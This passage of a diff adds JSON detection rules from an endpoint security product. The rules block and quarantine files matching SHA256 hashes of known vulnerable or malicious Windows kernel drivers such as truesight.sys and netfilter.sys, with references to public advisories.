+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.491938Z",
+ "creation_date": "2026-03-23T11:45:31.491940Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.491946Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "8a1b6c77ff2b68bbc492047d56234192f8a7ae7a69e92737e38db67a8e35ceb4",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "ded40bbc-1bc0-5abc-a8ab-d4870595901f",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.824097Z",
+ "creation_date": "2026-03-23T11:45:30.824099Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.824104Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "00d957e49a5b6c290c8d0f645b91d2688396c708464ae3da33b79d4ff964874b",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "dedff988-300f-56ee-a8c9-188aa9b544cd",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.486074Z",
+ "creation_date": "2026-03-23T11:45:31.486077Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.486087Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "f082d6c315906e10e06d2da9ba3b15396935c74e68b26f34cc026121e540b7a9",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "dee09683-3d9f-53cf-b209-70207d8b7774",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.817607Z",
+ "creation_date": "2026-03-23T11:45:31.817610Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.817618Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "6b6157234e63a145e4cbdb4b3236ab3daf40814a723ba8cc83c1156cc70a6f0c",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "dee6556d-b7e7-5038-83b3-d472ba9ec229",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.150651Z",
+ "creation_date": "2026-03-23T11:45:31.150653Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.150659Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "025664833087b5a79110ffeb655a9f3eedbcb1ef737959bdbd7c3f4ff9c15245",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "def2807f-9961-5726-97b6-58cd446f291c",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.972646Z",
+ "creation_date": "2026-03-23T11:45:29.972648Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.972653Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "485f3a67b826928c1f2d6ba7437b02d42c1b55a6511b521deb9a36aeb304ef98",
+ "comment": "TG Soft vulnerable driver (aka viragt.sys and viragt64.sys) [https://learn.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-driver-block-rules] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "def333ff-4b60-51b6-8bd6-5b0b3868d735",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.159728Z",
+ "creation_date": "2026-03-23T11:45:31.159730Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.159740Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "0eb7b71fe375b12475c29a427fe9b6cc1cb6608aa42b941e5df62a3db674473b",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "def35c13-bb3a-5b8f-a1af-3b7edd6b53cf",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.831458Z",
+ "creation_date": "2026-03-23T11:45:30.831460Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.831466Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "e77d67300df62b68912b851a1570d1706f5ef7214f340dacc9b183593995337e",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "defbb607-2629-550d-9a44-ec1bb262ab14",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.474450Z",
+ "creation_date": "2026-03-23T11:45:31.474454Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.474464Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "a9c34e35292bdbf1e112d13955a83548a9e6d0c907f8232a3caf2162cc20006b",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "deff8520-d81a-5d94-b8d7-237c5936132a",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.474747Z",
+ "creation_date": "2026-03-23T11:45:31.474751Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.474761Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "b72696370157b9ed2aa2cbed958b66836d4fc13099464cfc0e6758607961df19",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "df14440a-0095-5fce-9278-bb91178899be",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.827455Z",
+ "creation_date": "2026-03-23T11:45:31.827458Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.827466Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "8384f1b5b1e9dacbe78d329d5787f0ca8f10be035b796e9d19f7d81a9e3abacd",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "df1c70b3-fa68-5d00-8a2a-9e32eb2bdde0",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.620675Z",
+ "creation_date": "2026-03-23T11:45:29.620677Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.620682Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "845f1e228de249fc1ddf8dc28c39d03e8ad328a6277b6502d3932e83b879a65a",
+ "comment": "IBM Vulnerable Physmem drivers (aka citmdrv_amd64.sys and citmdrv_ia64.sys) [https://www.loldrivers.io/drivers/0f21a584-6ace-4242-82cb-9766cea6973a/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "df1c759c-8020-5f3e-b563-0f63270bd453",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.486499Z",
+ "creation_date": "2026-03-23T11:45:31.486502Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.486509Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "5bd0dc24102711f8c41cfa7299a2ab606224a8d52acf2a3cb9f7fc3d8102a8ff",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "df24868d-9e99-56ad-b279-4762de15c020",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.967316Z",
+ "creation_date": "2026-03-23T11:45:29.967319Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.967327Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "4a229ab274e364df92cc46ecbc9faab32f7b0955dab982658313f2faf9410863",
+ "comment": "Retliften malicious signed drivers (aka netfilter.sys) [https://msrc-blog.microsoft.com/2021/06/25/investigating-and-mitigating-malicious-drivers/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "df25a7b9-69a4-5e60-836f-f942c3d85338",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.982050Z",
+ "creation_date": "2026-03-23T11:45:29.982052Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.982058Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "ea0b9eecf4ad5ec8c14aec13de7d661e7615018b1a3c65464bf5eca9bbf6ded3",
+ "comment": "Vulnerable Kernel Driver (aka rwdrv.sys) [https://www.loldrivers.io/drivers/b03798af-d25a-400b-9236-4643a802846f/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "df347e10-0d1a-5575-9b71-125ceafd1e96",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.818548Z",
+ "creation_date": "2026-03-23T11:45:31.818551Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.818559Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "aaadfbe909aaa736fcd05fc1c93653adf03f538f4a86a99c90aaabf00db193dc",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "df373da0-6a43-5d5d-8ed6-9a81a506b462",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.831937Z",
+ "creation_date": "2026-03-23T11:45:30.831939Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.831952Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "30c4bba32e37c9e23f2852a1f4ee2d932add867138b59a91ee0636d158d107c0",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "df40da13-7216-542f-9129-8f5f25493d44",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.476306Z",
+ "creation_date": "2026-03-23T11:45:31.476310Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.476320Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "9ec7885c15536e216bf07925bd8251e034a91ccec52867bb306e7634f735aa48",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "df4302e7-87cd-5644-86db-58509df0c1b3",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.494140Z",
+ "creation_date": "2026-03-23T11:45:31.494143Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.494152Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "b67eb9bd456204bab6446c08d31a86fd4bf02da67a52c12d99e9d5630b270c23",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "df57b911-233f-59be-95fd-074466828d63",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:32.144652Z",
+ "creation_date": "2026-03-23T11:45:32.144654Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:32.144659Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "345ebed68c4e68aff5dd14c8df8524b69db4793845ca814bded608b246077792",
+ "comment": "Malicious Kernel Driver (aka driver_099ef491.sys) [https://www.loldrivers.io/drivers/2ba1bccf-d8d7-464a-9ae1-41371c55e5e8/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "df757311-db0d-5aa8-b32d-5fbc13ebd824",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.827993Z",
+ "creation_date": "2026-03-23T11:45:30.827996Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.828001Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "9a18654cf0bfa5223405493e42c4fca89a376ed06e6606d4339c951a5066c908",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "df770ca9-9ebe-505d-8ae1-2c0547490072",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.834520Z",
+ "creation_date": "2026-03-23T11:45:30.834524Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.834533Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "9e9c01d8717c3286edcd0fedc862570071be89947d2eb04eadd106a308a42709",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "df816063-520d-5938-abd2-83299c06d939",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.472752Z",
